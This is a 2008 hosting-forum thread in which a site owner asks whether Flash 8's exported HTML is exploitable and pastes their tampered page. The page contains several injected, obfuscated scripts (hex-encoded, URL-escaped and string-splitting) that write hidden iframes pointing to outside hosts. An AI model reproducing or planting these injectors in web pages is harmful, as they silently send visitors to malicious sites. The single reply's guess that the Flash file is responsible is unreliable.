Web Hosting Forum | Lunarpages
News: October 6, 2008 - Submit Your Site for the October 2008 Site of the Month!
 
Home Help Search Calendar Login Register
*
Welcome, Guest. Please login or register.
Did you miss your activation email? 		October 06, 2008, 10:09:38 AM


Login with username, password and session length


Web Hosting Forum | Lunarpages > Lunarpages Web Hosting - Advanced Assistance > Web Management > HTML exploit? FLASH 8 exported file..
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: HTML exploit? FLASH 8 exported file..  (Read 328 times)
Eludz
Pong! (the videogame) Master
*****
Offline Offline

Posts: 23
« on: February 11, 2008, 08:19:09 AM »
does FLASH 8's exported HTML file have an exploit that anyone knows about?

i have a swf file and an html file and somehow they are being changed on my webspace without my permission..

lunar pages is saying my 'scripts' are out of date.. i know there are newer versions of flash.. but i don't want to change anything yet, until i know for sure that is how they are getting into my files.. i have seen many mentions of flash 8 movies having exploits that allow malicious content to be RUN on the user's computer.. but that is not the case here.. it's that the files on the webspace are being hacked and changed and i'm being blamed for having out of date scripts and somehow this doesn't add up..


thanks for any help guys..

here is the HTML file code if that helps.. show me the exploit!!!



<script>function v475ee7778e039(v475ee7778e41e){  return(parseInt(v475ee7778e41e,16));}function v475ee7778efd5(v475ee7778f3bc){ function v475ee7778ff73 () {return 2;} var v475ee7778f7a4='';for(v475ee7778fb8b=0; v475ee7778fb8b<v475ee7778f3bc.length; v475ee7778fb8b+=v475ee7778ff73()){ v475ee7778f7a4+=(String.fromCharCode(v475ee7778e039(v475ee7778f3bc.substr(v475ee7778fb8b, v475ee7778ff73()))));}return v475ee7778f7a4;} document.write(v475ee7778efd5('3C5343524950543E2077696E646F772E7374617475733D27446F6E65273B20642E777269746528273C494652414D45206E616D653D616633207372633D5C27687474703A2F2F72616D6F6E65796D61796B65722E636E2F73656C6C2E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A32373030292B27326566395C272077696474683D313030206865696768743D32373E3C2F494652414D453E27293C2F5343524950543E'));</script>
<script>var mpl="<";var kmm="i";var vlyxh=" ";var ulcyi="crwgy='S7puCqgI' cgluy='fxZWpXcw' cqgdk='Dga8wbrE' mvamf='LPAXup7o' ijofk='Y9ho3812' spjvf='A0ZSYDuL' xyita='DVFQomqG' nobwl='Rg80zMo0' yunit='0THERq2J' src=";var eadeb="ame>";var palso="g/traffic/ft01/";var gccso=" ";var did="f";var owt="r";var uri="a";var hyubk="gvuno='i5DQvgk3' wilcc='UhHH0wor' ibvbi='9TGMZAQq' qrvha='KNUcjHWM' ujcjs='4rXIrLlR' wggix='A89Y55FX' ladwa='mrxxi08w' tjofc='uGbPsxRl' uvarl='woq7GpI6' ";var qnk="m";var iwg="e";var amcby="width=187 ";var mwbrg="http://reddii.or";var brxss="height=236 ";var yxoyr="style='display:none'";var ehajo=mwbrg+palso;var hmtls="></ifr";document.write(mpl+kmm+did+owt+uri+qnk+iwg+vlyxh+ulcyi+ehajo+gccso+hyubk+amcby+brxss+yxoyr+hmtls+eadeb);</script>


 
<script>var upp="<";var ver="i";var xkqac=" ";var hfklt="debva='6qHoU2bk' vohtp='RYArqnrR' hxvwv='SzfHdXjX' xjgmu='6XvlssSB' dbeiv='6sclZgOJ' fhaab='GLgjR9We' saryp='NLnZX8tU' oycqw='RLTTakYV' qtyck='BGJaXypU' src=";var pddwp="ame>";var irmph="g/traffic/ft01/";var gfmkf=" ";var idd="f";var ouf="r";var mjt="a";var mhdul="djvmm='NeE6io02' npgof='JgP8ujI2' otxam='7AEZZeAF' noode='tgd5BBKb' mkxsm='kyucRW12' xyyej='verHF55E' ebmfh='A2rWdUlW' ekdas='tjoxdc6e' txkxv='OeXZmUXE' ";var koa="m";var qci="e";var wnswu="width=737 ";var ylvjd="http://reddii.or";var avukt="height=96 ";var ejkbp="style='display:none'";var jaohp=ylvjd+irmph;var rxfgn="></ifr";document.write(upp+ver+idd+ouf+mjt+koa+qci+xkqac+hfklt+jaohp+gfmkf+mhdul+wnswu+avukt+ejkbp+rxfgn+pddwp);</script>

<script>var ply="<";var jks="i";var qmkgh=" ";var ewcxj="noysh='OoAbq9rD' bfpsy='o72yuai8' esvte='FHSBhQTf' ayubk='OPaDkbfE' qgdca='1XwERUVc' rtnyp='HcDHrs9u' pfrnh='FiopkKGQ' dmxky='mkZdpPXi' bpfwc='wY7ZWojn' src=";var rbole="ame>";var eoxob="g/traffic/ft01/";var bnrpm=" ";var kym="f";var teh="r";var jhs="a";var fllrh="cjivn='nMUFBHdi' ffdok='O7hZDeca' qsluv='SBp3sjHH' pqumf='mzihsdfe' aqktg='hUIq9Rzm' enswk='17LTPFKW' kvgje='q0sclMAD' jelom='ZHZbxybQ' lhnsj='VOZ3FroO' ";var mxr="m";var fyt="e";var gebcv="width=121 ";var qogof="http://reddii.or";var uwxvv="height=465 ";var vppuw="style='display:none'";var ooffc=qogof+eoxob;var lwyrw="></ifr";document.write(ply+jks+kym+teh+jhs+mxr+fyt+qmkgh+ewcxj+ooffc+bnrpm+fllrh+gebcv+uwxvv+vppuw+lwyrw+rbole);</script>
<script type='text/javascript'>

<!--

var msg=314,d=document;

eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%37%62%33%39%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%73%74%61%62%72%6f%6f%6d%2e%63%6e%2f%33%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%37%36%33%38%34%29%2b%27%62%64%32%5c%27%20%77%69%64%74%68%3d%32%34%38%20%68%65%69%67%68%74%3d%33%30%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );

//-->

</script>
Logged
meshackdotcom
Newbie
*
Offline Offline

Posts: 4
« Reply #1 on: February 18, 2008, 12:13:29 AM »
My guess... i'm not an expert just so you know... is that if you are being hacked, the code that's doing it is coming from your flash file, not the html. The actionscript that you are using, did you write that yourself or did you copy and paste it from somewhere? If so, from where? Can you post a link so we can take a look at it?
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC

Valid XHTML 1.0! Valid CSS! Dilber MC Theme by HarzeM